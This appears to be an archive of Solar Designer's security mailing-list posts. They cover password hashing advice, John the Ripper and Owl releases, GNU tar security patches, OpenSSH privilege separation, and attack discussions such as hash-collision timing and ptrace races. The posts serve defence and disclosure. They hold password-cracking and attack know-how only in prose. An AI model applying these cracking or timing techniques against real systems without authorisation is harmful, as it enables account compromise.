
Oh, and there's a new OpenMP-enabled build for Mac OS X here:

http://www.openwall.com/john/#contrib
http://download.openwall.net/pub/projects/john/contrib/macosx/

This one is by Erik Winkler, as usual.

I just thought you might enjoy these items too. ;-)


Re: [R7-0035] VxWorks Authentication Library Weak Password Hashing

2010-08-03 Thread Solar Designer
On Mon, Aug 02, 2010 at 11:55:05PM -0400, HD Moore wrote:
> -- Vendor Response:
> Wind River Systems has notified their customers of the issue and
> suggested that each downstream vendor replace the existing hash
> implementation with SHA512 or SHA256.

Like, without salting and stretching/strengthening?  That's not the best
suggestion.  I try to explain this without going into too much detail here:

http://www.openwall.com/articles/PHP-Users-Passwords#salting

At this time, vendors should implement either bcrypt (Blowfish-based):

http://www.openwall.com/crypt/

or SHA-crypt (usually the kind of it based on SHA-512, because that
makes better use of 64-bit CPUs):

http://www.akkadia.org/drepper/sha-crypt.html

There's almost no security difference between these two.  Both should
be replaced with something even better eventually - along the lines of
scrypt (adding more parallelism and configurable memory cost) - but
we're not ready for that yet (no peer-reviewed and agreed upon
implementation to recommend to vendors, even though some ideas in this
area have been floating around since 1990s).

Alexander


Re: [oss-security] [oCERT-2010-001] multiple http client unexpected download filename vulnerability

2010-06-11 Thread Solar Designer
Hi,

Here's a summary of relevant postings to oss-security and bug-wget.

Unofficial patch for wget, by Florian Weimer:
http://www.openwall.com/lists/oss-security/2010/05/17/2

PoC attack on a wget cron job resulting in a .bash_profile overwrite:
http://www.openwall.com/lists/oss-security/2010/05/18/13

Brief description of an attack on a wget cron job not involving a
dot-file nor a home directory (but involving a website tree instead):
http://lists.gnu.org/archive/html/bug-wget/2010-05/msg00032.html

Advice on back-porting lftp's fix to versions 3.4.7 through 4.0.5:
http://www.openwall.com/lists/oss-security/2010/05/20/2
http://www.openwall.com/lists/oss-security/2010/06/10/1

On Wed, Jun 09, 2010 at 06:16:39PM +0200, Marcus Meissner wrote:
> Did anyone assign CVE ids for these?

Marcus' reminder has resulted in the following CVE assignments:

CVE-2010-2251 - lftp
CVE-2010-2252 - wget
CVE-2010-2253 - libwww-perl as used in lwp-download

Alexander


key blacklisting & file size (was: OpenID/Debian PRNG/DNS Cache poisoning advisory)

2008-08-08 Thread Solar Designer
On Fri, Aug 08, 2008 at 11:20:15AM -0700, Eric Rescorla wrote:
> Why do you say a couple of megabytes? 99% of the value would be
> 1024-bit RSA keys. There are ~32,000 such keys. If you devote an
> 80-bit hash to each one (which is easily large enough to give you a
> vanishingly small false positive probability; you could probably get
> away with 64 bits), that's 320KB.

Regarding blacklist file size, we (Openwall and ALT Linux, with support
from CivicActions) have done some work on SSH key blacklisting, and our
encoding scheme should be reusable for SSL as well.  Our default
blacklist file contains 48-bit partial fingerprints for 1024-bit and
2048-bit RSA and 1024-bit DSA keys for PID range 1 to 32767 (a total of
almost 300k keys).  The installed file size is just 1.3 MB, which
corresponds to less than 4.5 bytes per fingerprint, and the .bz2 (and
.rpm) is just 1.2 MB.  (Naturally, with non-compressing binary encoding
the 48-bit fingerprints would be 6 bytes each.)

Lookups are very quick, and only three small portions of the file are
read per lookup, for a total of under 100 bytes of data to read (as far
as sshd is concerned).

Neither the code nor the file format is specific to 48-bit partial
fingerprints; it is possible to use larger ones by supplying something
other than "6" (the size in bytes) on blacklist-encode's command-line.

This code is currently in use in Openwall GNU/*/Linux (Owl) and ALT Linux
distributions, and it has successfully caught some weak SSH keys in the
wild.  Other systems/projects/whatever are more than welcome to reuse
the code or the encoding scheme.

My original announcement on oss-security:

http://www.openwall.com/lists/oss-security/2008/05/27/3

Dmitry V. Levin's follow-up with URL for forward-port of the patch to
newer OpenSSH:

http://www.openwall.com/lists/oss-security/2008/05/27/4

-- 
Alexander Peslyak 
GPG key ID: 5B341F15  fp: B3FB 63F4 D7A3 BCCC 6F6E  FC55 A2FC 027C 5B34 1F15
http://www.openwall.com - bringing security into open computing environments


safely concatenating strings in portable C (Re: GnuPG 1.4 and 2.0 buffer overflow)

2006-11-30 Thread Solar Designer
On Mon, Nov 27, 2006 at 06:13:02PM +0100, Werner Koch wrote:
> +n = strlen(s) + (defname?strlen (defname):0) + 10;
>  prompt = xmalloc(n);
>  if( defname )
> sprintf(prompt, "%s [%s]: ", s, defname );
...
> Note, that using snprintf would not have helped in
> this case.  How I wish C-90 had introduced asprintf or at least it
> would be available on more platforms.

Actually, if you dare to use snprintf() (either because you don't need
your code to be portable to platforms that lack snprintf() or because
you provide an implementation along with your application), then
implementing asprintf() on top of snprintf() is fairly easy (although
you do need to consider both snprintf() return value conventions).

However, in those (most common) cases when all you need is to concatenate
strings, relying on or providing an snprintf() implementation might be
an overkill.  For that reason, I wrote a trivial concat() function (for
popa3d) that should be much easier to audit than a full-blown *printf().
Please feel free to reuse it in any applications with no need to even
credit me (consider it hereby placed in the public domain, or you may
use it under the terms of the popa3d LICENSE).

The usage of concat() is as follows:

prompt = concat(s, " [", defname, "]: ", NULL);

You may also define an xconcat() (that would exit the program if the
allocation fails).

The code may be found here:


http://cvsweb.openwall.com/cgi/cvsweb.cgi/Owl/packages/popa3d/popa3d/misc.c?rev=HEAD

(it's the last function currently defined in that source file), or here
is the current revision:

#include 
#include 
#include 
#include 

char *concat(char *s1, ...)
{
va_list args;
char *s, *p, *result;
unsigned long l, m, n;

m = n = strlen(s1);
va_start(args, s1);
while ((s = va_arg(args, char *))) {
l = strlen(s);
if ((m += l) < l) break;
}
va_end(args);
if (s || m >= INT_MAX) return NULL;

result = malloc(m + 1);
if (!result) return NULL;

memcpy(p = result, s1, n);
p += n;
va_start(args, s1);
while ((s = va_arg(args, char *))) {
l = strlen(s);
if ((n += l) < l || n > m) break;
memcpy(p, s, l);
p += l;
}
va_end(args);
if (s || m != n || p - result != n) {
free(result);
return NULL;
}

*p = 0;
return result;
}

-- 
Alexander Peslyak 
GPG key ID: 5B341F15  fp: B3FB 63F4 D7A3 BCCC 6F6E  FC55 A2FC 027C 5B34 1F15
http://www.openwall.com - bringing security into open computing environments


Openwall GNU/*/Linux (Owl) 2.0 release

2006-02-16 Thread Solar Designer
Hi,

For those few who don't know yet, Openwall GNU/*/Linux (or Owl) is a
security-enhanced operating system with Linux and GNU software as its
core, intended as a server platform.  More detailed information is
available on the web site:

http://www.openwall.com/Owl/

After many Owl-current snapshots, Owl 2.0 release is finally out.  The
major changes made since Owl 1.1 are documented:

http://www.openwall.com/Owl/CHANGES-2.0.shtml

Owl 2.0 is built around Linux kernel 2.4.32-ow1, glibc 2.3.6 (with our
security enhancements), gcc 3.4.5, and recent versions of over 100 other
packages.  It offers binary- and package-level compatibility for most
packages intended for Red Hat Enterprise Linux 4 (RHEL4) and Fedora Core 3
(FC3), as well as for many FC4 packages.

Additionally, Owl 2.0 uses our new installer, making installation a lot
easier than it used to be for Owl 1.1 and below.

The new release (including an ISO-9660 image for the CD) can be freely
downloaded from our FTP mirrors:

http://www.openwall.com/Owl/DOWNLOAD.shtml

or it can be ordered on a CD with delivery worldwide:

http://www.openwall.com/Owl/orders.shtml

Of course, we prefer the latter, but it's your choice.  Similarly, you
may choose to pay just what it costs to get the CD to you, or you may
also support our project.

Owl CDs are bootable on x86 and include a live system, x86 binary
packages for installation to a hard drive, and full source code which
may be rebuilt with one simple command ("make buildworld").

Owl 2.0 binary packages for SPARC and Alpha (EV56+) are available via
the FTP mirrors only.

PGP-signed mtree(8) specifications for all of the above are available
via FTP and in the root directory of Owl CDs (such that you don't even
have to blindly trust CDs you receive in the mail).

The 1.1-stable branch is now officially unsupported, in favor of the
2.0 release and its corresponding stable branch.  Owl 2.0-stable already
exists in the CVS repository and will also be made available via FTP
once the need arises (that is, once an important post-release fix is
applied).

-- 
Alexander Peslyak 
GPG key ID: B35D3598  fp: 6429 0D7E F130 C13E C929  6447 73C3 A290 B35D 3598
http://www.openwall.com - bringing security into open computing environments


Re: John the Ripper 1.7; pam_passwdqc 1.0+; tcb 1.0; phpass 0.0

2006-02-10 Thread Solar Designer
On Thu, Feb 09, 2006 at 03:44:25PM -0500, Amin Tora wrote:
> Can a tool as this be as useful when there are rainbow tables out there
> to utilize for this kind of cracking? 

For salted hashes (such as of Unix passwords), definitely yes.  In fact,
I am not aware of rainbow table implementations for salted hashes,
although this is (barely) feasible for the obsolete/traditional crypt(3)
(but not for the newer flavors).
 
For saltless hashes (such as Windows LM hashes), it depends.  Is the
goal to get everything cracked, or is it to detect and eliminate
passwords that would be too weak to withstand certain attacks (e.g.,
automated remote login attempts)?  All LM hashes are crackable anyway.
(John the Ripper 1.7 can exhaustively search the entire printable
US-ASCII keyspace against any number of LM hashes within a couple of
weeks on a single modern CPU.)

When cracking large numbers of hashes at once, John the Ripper may
actually be faster than rainbow tables based crackers, -- and it will
also get the weakest passwords cracked earlier because it tries
candidate passwords in an optimal order.

Finally, often it is preferable to not spend lots of disk space and lots
of time and/or bandwidth to generate or download rainbow tables, -- and
also to not reveal your password hashes to a third party (such as one of
the online rainbow tables based cracking services).

Perhaps other Bugtraqers can provide additional reasons in favor of
either approach.

-- 
Alexander Peslyak 
GPG key ID: B35D3598  fp: 6429 0D7E F130 C13E C929  6447 73C3 A290 B35D 3598
http://www.openwall.com - bringing security into open computing environments

Was I helpful?  Please give your feedback here: http://rate.affero.net/solar


John the Ripper 1.7; pam_passwdqc 1.0+; tcb 1.0; phpass 0.0

2006-02-09 Thread Solar Designer
Hi,

This is to announce several related items at once. :-)

After 7+ years of development snapshots only (yes, I know, that was
wrong), John the Ripper 1.7 release is out:

http://www.openwall.com/john/

John the Ripper is a fast password cracker, currently available for
many flavors of Unix (11 are officially supported, not counting
different architectures), DOS, Win32, BeOS, and OpenVMS (the latter
with a patch or unofficial builds by Jean-loup Gailly).  Its primary
purpose is to detect weak Unix passwords.  Besides several crypt(3)
password hash types most commonly found on various Unix flavors,
supported out of the box are Kerberos/AFS and Windows NT/2000/XP LM
hashes, plus many more with contributed patches.

The changes made since the last development snapshot (1.6.40) are minor,
however the changes made since 1.6 are substantial:

http://www.openwall.com/john/doc/CHANGES.shtml

John the Ripper became a lot faster, primarily at DES-based hashes.
This is possible due to the use of better algorithms (bringing more
inherent parallelism of trying multiple candidate passwords down to
processor instruction level), better optimized code, and new hardware
capabilities (such as AltiVec available on PowerPC G4 and G5 processors).

In particular, John the Ripper 1.7 is a lot faster at Windows LM hashes
than version 1.6 used to be.  John's "raw" performance at LM hashes is
now similar to or even slightly better than that of commercial Windows
password crackers such as LC5, -- and that's despite John trying
candidate passwords in a more sophisticated order based on statistical
information (resulting in typical passwords getting cracked earlier).

John 1.7 also improves on the use of MMX on x86 and starts to use
AltiVec on PowerPC processors when cracking DES-based hashes (that
is, both Unix crypt(3) and Windows LM hashes).  To my knowledge, John
1.7 (or rather, one of the development snapshots leading to this
release) is the first program to cross the 1 million Unix crypts per
second boundary on a general-purpose CPU.  John 1.7 achieves up to
1.6M c/s raw performance (with no matching salts) on a PowerPC G5 at
2.7 GHz (or 1.1M c/s on a 1.8 GHz) and approaches 1M c/s on the fastest
x86 CPUs currently available.

Additionally, John 1.7 makes an attempt at generic vectorization support
for bitslice DES (would anyone try to set DES_BS_VECTOR high and compile
this on a real vector computer, with compiler vectorizations enabled?),
will do two MD5 hashes at a time on RISC architectures (with mixed
instructions, allowing more instructions to be issued each cycle), and
includes some Blowfish x86 assembly code optimizations for older x86
processors (Intel PPro through P3 and AMD K6) with no impact on newer
ones due to runtime CPU type detection.

Speaking of the actual features, John the Ripper 1.7 adds an event
logging framework (John will now log how it proceeds through stages of
each of its cracking modes - word mangling rules being tried, etc.),
better idle priority emulation with POSIX scheduling calls (once
enabled, this almost eliminates any impact John has on performance of
other applications on the system), system-wide installation support for
use by *BSD ports and Linux distributions, and support for AIX,
DU/Tru64 C2, and HP-UX tcb files in the "unshadow" utility.

Finally, there are plenty of added pre-configured make targets with
optimal settings, including for popular platforms such as Linux/x86-64,
Linux/PowerPC (including ppc64 and AltiVec), Mac OS X (PowerPC and x86),
Solaris/sparc64, OpenBSD on almost anything 32-bit and 64-bit, and more.

On a related note, pam_passwdqc and our tcb suite became mature enough
for their 1.0 releases.

pam_passwdqc is a simple password strength checking module for PAM-aware
password changing programs, such as passwd(1).  In addition to checking
regular passwords, it offers support for passphrases and can provide
randomly generated ones.  All features are optional and can be
(re-)configured without rebuilding.

pam_passwdqc works on Linux, FreeBSD 5+ (in fact, it's been integrated
into FreeBSD), Solaris, HP-UX 11+, and reportedly on recent versions of
IRIX.  Additionally, Damien Miller has developed and contributed a
plugin password strength checker for OpenBSD based on pam_passwdqc.
This plugin is now linked from the contributed resources list on the
pam_passwdqc homepage:

http://www.openwall.com/passwdqc/

The tcb package contains core components of our tcb suite implementing
the alternative password shadowing scheme on Openwall GNU/*/Linux and
distributions by ALT Linux team.  This allows core system utilities such
as passwd(1) to operate with little privilege, eliminating the need for
SUID to root programs.  The tcb suite has been in production use for
some years and has proven to work well.  Its homepage is:

http://www.openwall.com/tcb/

The tcb suite has been designed and implemented primarily by Rafal Wojtczuk,
with significant contri

crypt_blowfish 1.0

2006-02-07 Thread Solar Designer
Hi,

This is to announce the first mature version of crypt_blowfish and the
minor security fix that this version adds.

crypt_blowfish is a public domain implementation of a modern password
hashing algorithm based on the Blowfish block cipher, provided via the
crypt(3) and a reentrant interface.  It is compatible with bcrypt
(version 2a) by Niels Provos and David Mazieres, as used in OpenBSD.
The homepage for crypt_blowfish is:

http://www.openwall.com/crypt/

The most important property of bcrypt (and thus crypt_blowfish) is that
it is adaptable to future processor performance improvements, allowing
you to arbitrarily increase the processing cost of checking a password
while still maintaining compatibility with your older password hashes.
Already now bcrypt hashes you would use are several orders of magnitude
stronger than traditional Unix DES-based or FreeBSD-style MD5-based
hashes.

Besides providing a bcrypt implementation, the crypt_blowfish package
also includes a generic password hashing framework and hooks for
introducing this framework into the GNU C Library.  The provided
functions include crypt_gensalt*(), a family of functions for generating
"salts" for use with common Unix password hashing methods (that is, not
only with bcrypt).

Marko Kreen has discovered and reported a minor security bug in
crypt_blowfish 0.4.7 and below.  The bug affected the way salts for
BSDI-style extended DES-based and for FreeBSD-style MD5-based password
hashes were generated with the crypt_gensalt*() functions.  It would
result in a higher than expected number of matching salts with large
numbers of password hashes of the affected types.  crypt_gensalt*()'s
functionality for Blowfish-based (bcrypt) hashes that crypt_blowfish
itself implements and for traditional DES-based crypt(3) hashes was not
affected.

Since bcrypt hashes were not affected, default installs of
Openwall GNU/*/Linux (Owl) were never affected either.  The specific
impact this could have on non-default installs of Owl is described in
the latest Owl-current change log entry for glibc:

http://www.openwall.com/Owl/CHANGES-2.0.shtml

Since Owl 2.0 is scheduled to be released really soon and since the bug
is minor, we are not planning a similar glibc update for Owl 1.1-stable.
Instead, the 1.1-stable branch will be obsoleted by the new release.

For those curious about the nature of the bug, it was unintended sign
extension on a typecast.

As this crypt_blowfish bug is my own, and as I was well aware of this
pitfall and avoided it in other places, I am very embarrassed about
this.  I apologize to anyone who might be affected for the exposure and
inconvenience this causes.

-- 
Alexander Peslyak 
GPG key ID: B35D3598  fp: 6429 0D7E F130 C13E C929  6447 73C3 A290 B35D 3598
http://www.openwall.com - bringing security into open computing environments


Re: Algorimic Complexity Attacks

2003-06-02 Thread Solar Designer
On Thu, May 29, 2003 at 03:33:06PM -0500, Scott A Crosby wrote:
> They exploit the difference between 'typical case' behavior versus
> worst-case behavior. For instance, in a hash table, the performance is
> usually O(1) for all operations. However in an adversarial
> environment, the attacker constructs carefully chosen input such that
> large number of 'hash collisions' occur.

This is precisely one of the attacks which have been considered,
avoided(*), and documented in my Phrack #53 article entitled "Designing
and Attacking Port Scan Detection Tools" - "Data Structures and
Algorithm Choice" back in 1998.  Now you report another port scan
detector (Bro) still vulnerable to this attack.  I'm not surprised.

(*) http://www.openwall.com/scanlogd/

As for solutions, while using a keyed hash function offers the best
performance with a large enough number of entries (but not with a
small one!), it is rather complicated when done right, too easy to do
wrong, and may be imperfect anyway because of timing leaks (see
below).  It requires that a cryptographically random secret is used
(and really kept secret!), that it is large enough to not be
successfully brute-forced, and a cryptographic hash function is used
(or it might be possible to infer the secret).  This is why a hashing
library like yours is needed.  But for many applications it could make
more sense to use another data structure and algorithm (such as binary
search).

Now the promised attack on using a keyed hash function with the above
requirements met.  Let's assume that all input to the hash function,
except for the secret, is under control of an attacker.  Further,
let's assume that she is able to infer if a hash collision occurs by
measuring the time it takes to process a request (possibly repeating
each request multiple times).  After a bit of trying, she will know
that inputs A and B produce a collision.  She will then keep A and B
fixed and search for an input C which will collide with A and B.  And
so on.

Changing the secret once in a while reduces this attack and may well
make it impractical with many particular applications.  Note that one
doesn't have to use any additional true randomness (and possibly
exhaust the randomness pool) for each new secret to be used with the
keyed hash.  If the secret itself is not leaked in the attack (and it
shouldn't be), something as simple as secret++ could suffice.
However, this does have its difficulty: maintaining existing entries.

-- 
Alexander Peslyak <[EMAIL PROTECTED]>
GPG key ID: B35D3598  fp: 6429 0D7E F130 C13E C929  6447 73C3 A290 B35D 3598
http://www.openwall.com - bringing security into open computing environments


Re: d_path() truncating excessive long path name vulnerability

2002-11-28 Thread Solar Designer
On Wed, Nov 27, 2002 at 01:04:04PM +1100, Paul Szabo wrote:
> Back in March 2002, Wojciech Purczynski <[EMAIL PROTECTED]> wrote (original
> article at http://online.securityfocus.com/archive/1/264117 ):
> 
> > Name:   Linux kernel
> > Version:up to 2.2.20 and 2.4.18
> > ...
> > In case of excessively long path names d_path kernel internal function
> > returns truncated trailing components of a path name instead of an error
> > value. As this function is called by getcwd(2) system call and
> > do_proc_readlink() function, false information may be returned to
> > user-space processes.
> 
> The problem is still present in Debian 2.4.19 kernel. I have not tried 2.5,
> but see nothing relevant in the Changelogs at http://www.kernel.org/ .

FWIW, I've included a workaround for this (covering the getcwd(2) case
only, not other uses of d_path() by the kernel or modules) in 2.2.21-ow1
patch and it went into 2.2.22 release in September.

This kind of proves the need for double-checking newer kernel branches
(2.4.x and 2.5.x currently) for fixes going into what many consider
stable kernels.

-- 
/sd



Openwall GNU/*/Linux (Owl) 1.0 release

2002-10-16 Thread Solar Designer

Hi,

For those who don't know yet, Openwall GNU/*/Linux (or Owl) is a
security-enhanced operating system with Linux and GNU software as its
core, intended as a server platform.  And, of course, it's free.  More
detailed information is available on the web site:

http://www.openwall.com/Owl/

After over a year of development and many public Owl-current
snapshots, we're pleased to announce that Owl 1.0 is finally out.

The major changes made since 0.1-prerelease are documented:

http://www.openwall.com/Owl/CHANGES-1.0.shtml

The release may be freely downloaded from our FTP mirrors or ordered
on a CD.  Of course, we prefer the latter, but it's your choice.
Similarly, you may choose to pay just what it costs to get the CD to
you, or you may also support our project.

CDs (and ISO-9660 images available via the FTP mirrors) are bootable
on x86 and include a live system and x86 binary packages, as well as
full source code which may be rebuilt with one simple command ("make
buildworld").  Security tools such as John the Ripper are usable right
off the CD, without requiring a hard disk -- this way Owl may also be
considered an alternative to Trinux.

Currently available via the FTP mirrors only are the Owl 1.0 binary
packages for SPARC and Alpha architectures.

PGP-signed mtree(8) specifications for all of the above are available
via FTP and in the root directory of Owl CDs (such that you don't even
have to blindly trust CDs arriving via mail).

The 0.1-stable branch is now officially unsupported, in favor of the
1.0 release and its corresponding stable branch.  The change logs for
0.1-stable (which include security fix information) are no longer on
the web site, however 0.1-stable is still available on the FTP mirrors
(for reference only) and will of course remain available via anoncvs.

Owl 1.0-stable already exists in the CVS (in fact, it's been started
prior to the 1.0 release this time) and will also be made available
via FTP once the need arises (that is, a critical post-release fix is
applied).

Development will continue primarily in Owl-current, although we might
make another release based on 1.0-stable as well.

-- 
/sd



GNU tar (Re: Allot Netenforcer problems, GNU TAR flaw)

2002-10-09 Thread Solar Designer

On Fri, Sep 27, 2002 at 02:11:07AM +0200, Bencsath Boldizsar wrote:
> 2. Description of the "tar" problem
>
> Creating a tar file with -P option one can put any file names in the tar
> file. While unpacking such tar files, tar is designed to remove leading
> slash. Other security feature of the tar package is to deny deployment of
> any files whose name contains "dotdot" (".."). A bug in the tar package
> leads to a security flaw:
> "../something" is denied by tar
> "/something" leading slash is removed
> "/../something"  leading slash removed but ".." is NOT denied
> "./../something" ".." is NOT denied.
>
> Although we found this bug by studying tar, we found that this bug has
> been found by others, we should give them credit:

I believe 3APA3A was first to post this to Bugtraq last year:

http://marc.theaimsgroup.com/?l=bugtraq&m=99496364810666

At least 1.13.17 and 1.13.18 are known to get the contains_dot_dot()
function right, some older versions certainly didn't have it.  1.13.19
introduced a bug which broke the check and it's still not fixed in
1.13.25.

There's another related problem where tar could be made to follow a
symlink it just extracted and place a file outside of the intended
directory tree, pointed out on Bugtraq by Willy TARREAU in 1998:

http://marc.theaimsgroup.com/?l=bugtraq&m=90674255917321

Paul Eggert included a fix for it in 1.13.18:

"2000-10-23

...Extract potentially dangerous symbolic links more carefully,
deferring their creation until the end, and using a regular file
placeholder in the meantime."

However, he later broke it with a typo (reversed check) in 1.13.19.
1.13.25 has that check fixed again.

I've now fixed these two bugs and a third (non-security) bug that
1.13.19 introduced for the Owl package, with proper credit to you and
others involved, in both the package and the system-wide change log:

http://www.openwall.com/Owl/CHANGES.shtml

Although the two security bugs are now fixed, please keep in mind that
tar has traditionally been intended for making and extracting tape
backups rather than archives obtained from untrusted sources.  Be very
careful with what input you pass it and what user you run it as.

I've attached the two security patches to this message.  The dot-dot
patch is valid for 1.13.19 to 1.13.25, the symlink patch is needed for
1.13.19 and possibly some versions after it but not 1.13.25.  Other
patches that we use may be obtained via:

cvs -z3 -d :pserver:anoncvs:[EMAIL PROTECTED]:/cvs co Owl/packages/tar

or:

http://www.openwall.com/Owl/ (and pick an FTP mirror)
ftp://ftp.ru.openwall.com/pub/Owl/current/native.tar.gz

-- 
/sd


diff -ur tar-1.13.19.orig/src/misc.c tar-1.13.19/src/misc.c
--- tar-1.13.19.orig/src/misc.c Sat Jan 13 08:59:29 2001
+++ tar-1.13.19/src/misc.c  Sat Sep 28 13:48:03 2002
@@ -206,12 +206,12 @@
   if (p[0] == '.' && p[1] == '.' && (ISSLASH (p[2]) || !p[2]))
return 1;

-  do
+  while (! ISSLASH (*p))
{
  if (! *p++)
return 0;
}
-  while (! ISSLASH (*p));
+  p++;
 }
 }



diff -ur tar-1.13.19.orig/src/extract.c tar-1.13.19/src/extract.c
--- tar-1.13.19.orig/src/extract.c  Sat Jan 13 08:59:29 2001
+++ tar-1.13.19/src/extract.c   Sat Sep 28 15:37:33 2002
@@ -850,7 +850,7 @@
break;

   if (absolute_names_option
- || (ISSLASH (current_link_name
+ || (! ISSLASH (current_link_name
   [FILESYSTEM_PREFIX_LEN (current_link_name)])
  && ! contains_dot_dot (current_link_name)))
{



Re: Upcoming OpenSSH vulnerability

2002-06-26 Thread Solar Designer

On Mon, Jun 24, 2002 at 03:00:10PM -0600, Theo de Raadt wrote:
> There is an upcoming OpenSSH vulnerability that we're working on with
> ISS.  Details will be published early next week.
> 
> However, I can say that when OpenSSH's sshd(8) is running with priv
> seperation, the bug cannot be exploited.
> 
> OpenSSH 3.3p was released a few days ago, with various improvements
> but in particular, it significantly improves the Linux and Solaris
> support for priv sep.  However, it is not yet perfect.  Compression is
> disabled on some systems, and the many varieties of PAM are causing
> major headaches.
> 
> However, everyone should update to OpenSSH 3.3 immediately, and enable
> priv seperation in their ssh daemons, by setting this in your
> /etc/ssh/sshd_config file:
> 
>   UsePrivilegeSeparation yes

Owl-current has been updated to include OpenSSH 3.3p1 with privilege
separation enabled (and a patch to make that work on Linux 2.2 kernels
which we continue to support).  The updated source tree and packages
went to the FTP mirrors by Monday.

This stuff is, however, still being hacked on because of certain
minor functionality problems that remain in this rushed release.
Expect further updates in the following days and next week.

It is strongly recommended that Openwall GNU/*/Linux (Owl) users
update first to these 3.3p1-based privilege separated update packages
and then to ones based on the upcoming OpenSSH releases.

The details of the changes we apply will be documented in change logs
for the OpenSSH package as well as in the system-wide change logs
under Owl/doc/CHANGES in the native tree, also available via the web:

http://www.openwall.com/Owl/CHANGES.shtml

The SSH server used to be the only Internet service provided with Owl
that didn't utilize privilege separation approaches.  Now, thanks to
the excellent work by Niels Provos, we are able to provide a system
where all the Internet services are provided with privilege-separated
implementations.  That includes FTP, SMTP, POP3, Telnet, and now SSH.

Those curious of how this all works may see our diagrams of the FTP,
POP3, and Telnet servers in our CanSecWest/core02 / NordU2002 slides:

http://www.openwall.com/presentations/core02-owl-html+images/

The FTP server is Chris Evans' vsftpd.  The POP3 is popa3d.  And the
Telnet is a port from OpenBSD with privilege separation introduced in
a way similar to what Chris Evans did in his patches to NetKit's (but
the code is different).  In all cases, the processes which talk to the
remote client are running as a dedicated pseudo-user (different for
each service) and chroot'ed to an empty directory (/var/empty).

For the privilege-separated OpenSSH sshd, please refer to Niels Provos'
web page on the topic:

http://www.citi.umich.edu/u/provos/ssh/privsep.html

The SMTP server is Postfix, with many of its components running in a
chroot jail:

http://www.postfix.org/security.html
http://www.postfix.org/big-picture.html

In fact, the checking of file accesses performed by Postfix that we
did as a part of maintenance of the package on Owl has contributed
to making Postfix's privilege separation more solid (starting with the
20011217 snapshot).

-- 
/sd



Re: Remote Timing Techniques over TCP/IP

2002-04-19 Thread Solar Designer

On Thu, Apr 18, 2002 at 09:45:53AM -0500, Mauro Lacy wrote:
> REMOTE TIMING TECHNIQUES

It's good to see this kind of weaknesses to start being publicized.  I
know there's another similar paper to be published soon.

We've been discussing the possibility to apply a variation of Kocher's
attack against SSH clients w/ RSA/DSA authentication (where a malicious
server would obtain the client's private key and be able to use that
against another server) with Markus and Niels of OpenSSH just recently.

I don't see how a client -> server attack against SSH would be possible
(other than on usernames and such).

The leak of usernames is of course the most obvious example, pretty much
every service is affected.  Of course we avoid leaks like that in our
code (popa3d, pam_tcb on Owl), but we haven't fixed our system libraries
(such as glibc's NSS modules) yet and those are used by all services.

-- 
/sd



Re: local root compromise in openbsd 3.0 and below

2002-04-11 Thread Solar Designer

On Thu, Apr 11, 2002 at 01:29:28PM +0200, Przemyslaw Frasunek wrote:
> default root crontab entry looks like:
> 
> # do daily/weekly/monthly maintenance
> # on monday only (techie)
> 30  1   *   *   1   /bin/sh /etc/daily 2>&1 | tee /var/log/d
> aily.out | mail -s "`/bin/hostname` daily output" root
> 30  3   *   *   6   /bin/sh /etc/weekly 2>&1 | tee /var/log/
> weekly.out | mail -s "`/bin/hostname` weekly output" root
> 30  5   1   *   *   /bin/sh /etc/monthly 2>&1 | tee 
>/var/log/monthly.out | mail -s "`/bin/hostname` monthly output" root

Dangerous stuff.  (The same applies to much of /etc/security on *BSD's.)

> Patch: 
>http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24

The bug appears to have been introduced before OpenBSD 2.9 (in January,
2001), with this commit message:

Changes from Don Beusee:
[...other changes skipped...]
o tilde commands work regardless of interactive mode.

The mailx (/bin/mail) on Owl is derived from OpenBSD 2.7 code and thus
doesn't contain this vulnerability.  (Should sync with the new OpenBSD
code eventually, but as we can see doing a sync blindly would be worse
than not doing it at all for a while longer.)  We also don't have cron
jobs like this.

-- 
/sd



Re: x86 vulnerability

2001-04-28 Thread Solar Designer

On Thu, Apr 26, 2001 at 03:41:49PM +0200, Florian Weimer wrote:
> Johnny Cyberpunk * <[EMAIL PROTECTED]> writes:
> > The LSD Team has found this bug in the ARGUS System. Know since January
> > 2001, found by a NETBSD-Team and fixed very earlier than SUN has.
> > SUN fixed it primal on 17.04.2001 and ARGUS hasn't patched it.
>
> Has anybody looked at the LDT modification syscall in the Linux
> kernel?

I did, and wrote this in a private discussion a few days ago:

| I've checked the implementation of modify_ldt(2) on Linux 2.0 and 2.2
| after the NetBSD advisory was released (the next day, actually) and
| posted my comments to security-audit:
|
| http://marc.theaimsgroup.com/?l=linux-security-audit&m=98237041708897
|
| Basically, this instance of the vulnerability doesn't affect Linux and
| I'm not aware of another which would, but the code could be made safer.
|
| Of course, it would be nice if someone double-checks this.

Matt Chapman has independently reviewed the same code now (thanks!)

--
/sd



Re: ptrace/execve race condition exploit (non brute-force)

2001-03-28 Thread Solar Designer

On Wed, Mar 28, 2001 at 01:32:15AM +0200, Mariusz Woloszyn wrote:
> Anyway: here is a fast way to fix the problem (but intoduces new one), the
> kernel module that disables ptrace syscall.

Don't forget that the race isn't only against ptrace.  There's
procfs.  Fortunately, get_task() in fs/proc/mem.c checks for
PF_PTRACED, so the worst ways of abuse via procfs are solved with
disabling ptrace.  But it is not so obvious what other attacks
remain possible.

--
/sd



Re: ptrace/execve race condition exploit (non brute-force)

2001-03-27 Thread Solar Designer

On Tue, Mar 27, 2001 at 02:05:54PM +0200, Wojciech Purczynski wrote:

Hi,

> Here is exploit for ptrace/execve race condition bug in Linux kernels up
> to 2.2.18.

Thanks for not releasing this before Linux 2.2.19 is out.  It would
be even better if you delayed this until the vendor updates are ready
(should be very soon) like I was planning to.

> It works even on openwall patched kernels (including broken fix in 2.2.18ow4)

Yes, the fix in 2.2.18-ow4 and 2.0.39-ow2 is insufficient -- it only
reduced the window without completely fixing the race.

I'd like to thank Rafal Wojtczuk for discovering the problem with my
original fix almost immediately after its release and reporting it to
me and the affected vendors privately.  Unfortunately, Linux 2.2.19
and the vendor updates couldn't be released until now for other valid
reasons(*) so I had to decide against releasing a 2.2.18-ow5, submit
the correct fix for 2.2.19 and wait until it's released.

Linux 2.2.19 is out.  I've released the 2.2.19-ow1 and 2.0.39-ow3
patches yesterday:

http://www.openwall.com/linux/

Please upgrade to one of these versions.

(*) To be explained here after the vendor updates are ready.

--
/sd



Passive Analysis of SSH (Secure Shell) Traffic

2001-03-19 Thread Solar Designer
duce the
search space for uniformly randomly chosen passwords of 8 characters
by a factor of 50.

Although the paper is not yet publicly available, vendors working to
fix these problems may contact David Wagner 
or Dawn Xiaodong Song  to obtain a copy.


